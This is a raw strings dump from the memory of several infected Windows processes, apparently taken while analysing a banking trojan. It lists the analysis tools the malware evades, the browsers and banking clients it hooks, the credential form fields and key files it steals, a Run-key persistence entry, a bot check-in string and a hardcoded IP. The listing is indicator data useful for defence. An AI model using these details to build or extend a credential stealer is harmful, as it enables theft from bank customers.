HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
ADM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_1048_rwx_00720000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_1048_rwx_00C70000_00065000:

.text
`.rdata
@.data
.reloc
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
LOCALSERVICE!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_1156_rwx_00EF0000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
explorer.exe
1.2.5
Winmm.dll
Kernel32.dll
Gdi32.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
u.bmp
\\.\PhysicalDrive%u
/topic.php
keylog.txt
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
/faq.php
botid=%s&ver=1.0.2&up=%u&os=u&rights=%s&ltime=%s%d&token=%d&cn=test
\chrome.exe
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
login=
password=
pass_
&ctl00$MainMenu$Login1$UserName=
&ctl00$MainMenu$Login1$Password=
advapi32.dll
login
name=%s&port=%u
/home.php
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\self.cer
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
bsi.dll
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
keys\
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
vb_pfx_import
\*.bk
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
w.qiwi.ru
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
smime3.dll
nss3.dll
softokn3.dll
nssutil3.dll
sqlite3.dll
plc4.dll
plds4.dll
mozcrt19.dll
webmoney
balance.htm
%s\%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

svchost.exe_1156_rwx_01260000_00065000:


svchost.exe_1280_rwx_005E0000_00056000:


svchost.exe_1280_rwx_00640000_00065000:


Dwm.exe_1376_rwx_007A0000_00056000:


Dwm.exe_1376_rwx_00800000_00065000:


Explorer.EXE_1440_rwx_03FE0000_00056000:

login.yota.ru
YotaConfirmForm[password]
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
LibVNCServer 0.9.7
%s (%s)
d/d/d d:d
password check failed!
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertOpenStore
CertAddCertificateContextToStore
CertCloseStore
CertGetNameStringA
CertGetCertificateContextProperty
PFXImportCertStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
CertVerifyTimeValidity
PFXExportCertStoreEx
CRYPT32.dll
WinSCard.dll
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MSVCRT.dll
PSAPI.DLL
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
WS2_32.dll
ShellExecuteA
SHFileOperationA
SHELL32.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetProcessHeap
WinExec
KERNEL32.dll
MapVirtualKeyW
SetKeyboardState
EnumChildWindows
GetKeyboardState
MsgWaitForMultipleObjects
USER32.dll
SetViewportOrgEx
GetViewportOrgEx
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegEnumKeyExA
RegNotifyChangeKeyValue
CryptGetKeyParam
CryptDestroyKey
RegOpenKeyA
CryptGetUserKey
RegDeleteKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
;3 #>6.&
'2, / 0&7!4-)1#
Desk_%u%x
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
.Prev
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

Explorer.EXE_1440_rwx_04100000_00065000:

ADM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\

svchost.exe_1732_rwx_003E0000_00056000:

svchost.exe_1732_rwx_00BE0000_00065000:

WINUK0FFOO83I6!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\

TPAutoConnect.exe_2160_rwx_00390000_00056000:

TPAutoConnect.exe_2160_rwx_012E0000_00065000:

ADM!WINUK0FFOO83I6!427963A6
MSCTF.Shared.MAPPING.fffffffe
MSCTF.Shared.MAPPING.ffffffff
MSCTF.Shared.MAPPING.fffffffd
MSCTF.Shared.MUTEX.fffffffe
MSCTF.Shared.MUTEX.ffffffff
C:\Windows\apppatch\xodaql.exe
C:\Windows\system32\config\systemprofile\AppData\Roaming\
00c0
9!91969<9
?"?3?9?>?}?
11C1T1]1r1
4(4-484=4
= =$=(=,=0=4={=
mavast.com
ya.ru
serverkey.dat
\windows\
hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx
btnLogin

conhost.exe_2168_rwx_01150000_00056000:

.text
`.data
.reloc
`.rdata
@.data
<>http
name.key
\secrets.key
sign.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
dumpcap.exe
wireshark.exe
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
C:\iDEFENSE
\\.\NPF_NdisWanIp
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/key.bin
data.txt
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
